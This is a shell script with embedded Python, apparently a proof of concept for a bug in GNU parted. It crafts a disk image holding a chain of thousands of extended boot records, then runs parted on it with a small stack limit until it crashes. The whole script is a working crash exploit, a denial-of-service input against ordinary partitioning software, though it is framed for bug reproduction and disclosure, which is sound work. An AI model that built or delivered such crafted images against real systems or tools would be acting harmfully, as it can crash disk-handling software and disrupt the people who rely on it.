#!/bin/sh
set -eu

parted_bin=${PARTED_BIN:-}
if [ -z "$parted_bin" ]; then
	if which parted >/dev/null 2>&1; then
		parted_bin=$(which parted)
	fi
fi

if [ -z "$parted_bin" ]; then
	echo "PoC skipped: set PARTED_BIN to a parted binary."
	exit 0
fi

if ! which python3 >/dev/null 2>&1; then
	echo "PoC requires python3 to create the disk image."
	exit 1
fi

depth=${DEPTH:-20000}
stack_kb=${STACK_KB:-1024}
timeout_s=${TIMEOUT_S:-45}
sector_size=512
image_path=${IMAGE_PATH:-./parted-mbr-ebr-crash.img}
keep_image=${KEEP_IMAGE:-1}
image_size_mb=${IMAGE_SIZE_MB:-}
with_logical=${WITH_LOGICAL:-0}

tmp=$(mktemp -d "${TMPDIR:-/tmp}/parted-ebr-poc.XXXXXX")
if [ -n "$image_path" ] || [ "$keep_image" = "1" ]; then
	trap 'rm -rf "$tmp/parted.out" "$tmp/parted.err"' EXIT HUP INT TERM
else
	trap 'rm -rf "$tmp"' EXIT HUP INT TERM
fi

if [ -n "$image_path" ]; then
	img=$image_path
else
	img=$tmp/ebr-chain.img
fi
out=$tmp/parted.out
err=$tmp/parted.err

python3 - "$img" "$depth" "$sector_size" <<'PY'
import os
import struct
import sys

img = sys.argv[1]
depth = int(sys.argv[2])
sector_size = int(sys.argv[3])
image_size_mb = os.environ.get("IMAGE_SIZE_MB", "")
with_logical = os.environ.get("WITH_LOGICAL", "0") == "1"

if depth < 2:
    raise SystemExit("depth must be at least 2")

stride = 2
base = 1
sectors = base + depth * stride + 2
if image_size_mb:
    fixed_sectors = int(image_size_mb) * 1024 * 1024 // sector_size
    if fixed_sectors < sectors:
        raise SystemExit(
            f"IMAGE_SIZE_MB={image_size_mb} is too small for depth={depth}; "
            f"need at least {(sectors * sector_size + 1024 * 1024 - 1) // (1024 * 1024)} MiB"
        )
    sectors = fixed_sectors

def part_entry(part_type, start, length):
    return struct.pack(
        "<B3sB3sII",
        0,
        b"\x00\x02\x00",
        part_type,
        b"\xff\xff\xff",
        start,
        length,
    )

def write_table(f, sector, entries):
    buf = bytearray(sector_size)
    off = 446
    for entry in entries:
        buf[off:off + 16] = entry
        off += 16
    buf[510:512] = b"\x55\xaa"
    f.seek(sector * sector_size)
    f.write(buf)

with open(img, "wb") as f:
    f.truncate(sectors * sector_size)

    write_table(
        f,
        0,
        [part_entry(0x05, base, sectors - base)],
    )

    for i in range(depth):
        ebr = base + i * stride
        entries = []
        if with_logical:
            entries.append(part_entry(0x83, 1, 1))
        if i + 1 < depth:
            next_ebr = base + (i + 1) * stride
            entries.append(part_entry(0x05, next_ebr - base, sectors - next_ebr))
        write_table(f, ebr, entries)

print(f"created {img}")
print(f"image layout: raw MBR disk image, sector_size={sector_size}")
print("mbr: LBA 0 contains one extended partition entry")
if with_logical:
    print("ebr chain: each non-final EBR contains one logical Linux partition and one next-EBR link")
    print("warning: WITH_LOGICAL=1 can hit Parted's 64-partition msdos label cap before stack exhaustion")
else:
    print("ebr chain: each non-final EBR contains only a next-EBR link")
print(f"depth={depth} sectors={sectors} logical_partitions={depth if with_logical else 0}")
print(f"image_size_bytes={sectors * sector_size}")
PY

echo
if [ "$keep_image" = "1" ] || [ -n "$image_path" ]; then
	echo "Keeping image artifact: $img"
fi
echo "Running: $parted_bin -s $img unit s print"
echo "Stack limit: ${stack_kb} KiB"

ulimit -s "$stack_kb" 2>/dev/null || true

set +e
if which timeout >/dev/null 2>&1; then
	timeout_bin=$(which timeout)
	"$timeout_bin" "$timeout_s" "$parted_bin" -s "$img" unit s print >"$out" 2>"$err"
	status=$?
else
	"$parted_bin" -s "$img" unit s print >"$out" 2>"$err"
	status=$?
fi
set -e

echo "parted exit status: $status"
if [ -s "$err" ]; then
	echo "stderr:"
	sed 's/^/  /' "$err"
fi

case "$status" in
	139|134)
		echo "BUG TRIGGERED: parted crashed while parsing the long EBR chain."
		exit 0
		;;
	124)
		echo "PoC timed out. This may still indicate excessive recursive parsing; increase TIMEOUT_S or lower STACK_KB."
		exit 1
		;;
	*)
		if grep -qi 'segmentation fault\|stack overflow' "$err"; then
			echo "BUG TRIGGERED: crash text was reported while parsing the long EBR chain."
			exit 0
		fi
		echo "Bug not triggered at DEPTH=$depth STACK_KB=$stack_kb. Try a larger DEPTH."
		exit 1
		;;
esac
